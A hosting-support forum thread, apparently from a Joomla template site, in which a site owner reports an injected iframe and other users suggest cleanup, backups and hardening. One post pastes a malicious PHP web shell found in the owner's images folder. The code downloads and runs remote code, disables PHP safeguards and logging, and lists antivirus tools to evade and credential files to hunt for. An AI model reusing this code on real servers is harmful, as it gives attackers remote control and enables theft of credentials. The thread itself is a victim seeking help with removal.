Trojan / Virus On My Site
-
-
- Royalty
- Jr. Rocketeer
- Posts: 32
- Thanks: 0
-
Somehow an iframe is inserted at the top of some of my pages. I'm trying to figure out how I go about removing this. It seems to be showing up on my 404 pages and on a random audio page for some reason. Norton's page shows that it's on my home page as well, but I cant see it there anywhere. Apparently it only affects IE, but I obviously need to remove it asap.
Any help would be GREATLY appreciated! - Last Edit: 14 years 11 months ago by Royalty.
-
-
-
- Rich Bean
- Elite Rocketeer
- Posts: 1194
- Thanks: 1
-
Look in your root directory for files that should not be there. Then go through all of your public html subdirectories. That's normally easiest.
Also make sure you're files aren't set to 777. - My Sites:
Perth Website Design
Scuba Marketing
I'm a Henning Stalker!
-
-
-
- JEM
- Preeminent Rocketeer
- Posts: 17917
- Thanks: 4
-
1) Contact your host and let them know you were hacked.
2) Along with Richard's suggestion, another option is to wipe the site clean and restore from your latest backup. If you don't have a recent one your host may. Usually hosts back up every 24 hours and keep 3 day's worth of backups, you might get lucky... You should also consider after all this is sorted, creating a solid backup strategy. Many of us use Akeeba and back up often. (Before and after making major changes or updates.)
www.akeebabackup.com/akeeba-backup-for-joomla/index.html
3) www.rockettheme.com/forum/index.php?f=15&t=54455&rb_v=viewtopic - Scroll down to 'Joomla Security and Configuration', there's lots of info for securing your site. - Thanks,
jim
-
-
-
- Royalty
- Jr. Rocketeer
- Posts: 32
- Thanks: 0
-
I found a suspicious file in my /images folder. Apparently its set to automatically run some sort of script or something. I'm not sure if this is what is placing the iframe "xm" at the top of my pages or not. I deleted it, but the iframe is still appearing, so I guess I got more work to do.
<?php if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");} if(isset($_POST['start_socks'],$_POST['download_path'])) { function execute($cfe) { $res = ''; if(@function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(@function_exists('shell_exec')) $res = @shell_exec($cfe); elseif(@function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } } @$f=fopen('/tmp/httpd_conf.tmp.php','w'); fwrite($f,file_get_contents($_POST['download_path'])); fclose($f); $path = execute("which php"); @execute("$path /tmp/httpd_conf.tmp.php &"); die; } $language='eng'; $auth = 0; $name='7d1f6442a9ed59e62f93d'; $pass='7d1f6442a9ed59e62f93d'; //ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8 @setlocale(LC_ALL,'ru_RU.cp1251'); @ini_restore("safe_mode"); @ini_restore("open_basedir"); @ini_restore("safe_mode_include_dir"); @ini_restore("safe_mode_exec_dir"); @ini_restore("disable_functions"); @ini_restore("allow_url_fopen"); if(@function_exists('ini_set')) { @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1); @ini_set('allow_url_fopen',1); } else { @ini_alter('error_log',NULL); @ini_alter('log_errors',0); @ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1); } error_reporting(E_ALL); /* Äëÿ øàïêè */ $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm', 'tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); $tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/'); /* Äëÿ ÷òåíèÿ ëèñòèíãà äèðû ÷åðåç realpath() */ //$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; //$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz"; //$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ"; //$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz"; //$chars_rlph = "_-.01234567890"; $chars_rlph = "abcdefghijklnmopqrstuvwxyz"; $presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php', 'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root', 'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs', 'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing','Windows', 'Documents and Settings','Program Files','boot.ini','apache'); /******************************************************************************************************/
-
-
-
- RuiGato
- Sr. Rocketeer
- Posts: 209
- Thanks: 0
-
1 download your site to your pc via ftp
2 download latest version of J!
3 compare file by file with winmerge
you can see if there are any new files or modification in the core ones
if you have any components/modules installed compare them also
check for any files suspected in the media and templates folder
check the security check list in the Joomla docs
you can find something this way but the most important thing imo is to find how they get on your site also.
Keep your pc secure, use strong passwords, dont use admin account if you use windows, use a ftp program that encripts the passwords (programs like fillezilla store passwords in a plain xml file bad thing if your pc is compromised)
make regular and redundant backups
dont use the same pass for cpanel/database/joomla admin/ftp
obscure your site removing the generator $this->setGenerator('anything');
keep your extensions updated, uninstall unused extensions, subscribe the security feeds, check your extensions support foruns regular for updates
get a decent host, check the php settings, check your files/folder permissions
man the list never ends and even if you follow every single step and reccomendation known you still arent 100% secure - twitter.com/ruigato
-
-
-
- Rich Bean
- Elite Rocketeer
- Posts: 1194
- Thanks: 1
-
Or you can use something like
anti-hacker.opensource-excellence.com/
it's commercial GPL but worth every penny in my opinion, and the lead developer Helix is a really nice and responsive guy.
R
PS. No affiliation with them. - My Sites:
Perth Website Design
Scuba Marketing
I'm a Henning Stalker!
-
-
-
- lafrance
- Hero Rocketeer
- Posts: 324
- Thanks: 0
-
@RICHARD BEAN
+1
I use it so far so good
What I love also there was a bug in 1 joomla version that change some php and images file permission too 666
Was able to notice it right away and change it
Pierre - Please be kind no PM without asking,Pm without asking will result in fow list
help also on freenode irc #joomla,hosting solution for a great value 20 users only per server.
Pierre.
-
Time to create page: 0.084 seconds